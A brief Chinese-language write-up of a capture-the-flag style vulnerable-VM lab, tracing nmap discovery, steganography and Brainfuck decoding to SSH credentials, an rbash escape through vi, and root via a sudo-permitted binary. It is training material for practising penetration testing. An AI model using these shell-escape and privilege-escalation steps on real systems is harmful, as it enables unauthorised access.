靶机设置
设置靶机为NAT模式
靶机IP发现
nmap 192.168.112.0/24
靶机ip为192.168.112.136
目录扫描
只开了一个31337端口,进行扫描
没扫出目录
访问浏览器
访问192.168.112.136:31337
查看源码
发现有一个key_is_h1dd3n.jpg图片
发现提示藏着密码,对图片解码
将图片下载下来放在kali进行破解
发现需要密码,文件名字说密码是h1dd3n
破解好后查看,发现brainfuck加密
进行解密
内容为ud64:1M!#64@ud
ssh登陆
ssh ud64@192.168.112.136 -p 1337
密码为1M!#64@ud
登陆成功
发现是rbash限制
双击Tab查看可执行的命令
vi
按shift+:
!/bin/bash
export PATH=/usr/sbin:/usr/bin:/sbin:/bin
进行环境配置
提权
sudo -l查看免密操作
发现可以进行syssud64的操作
sudo sysud64 -o /dev/null /bin/bash
提权成功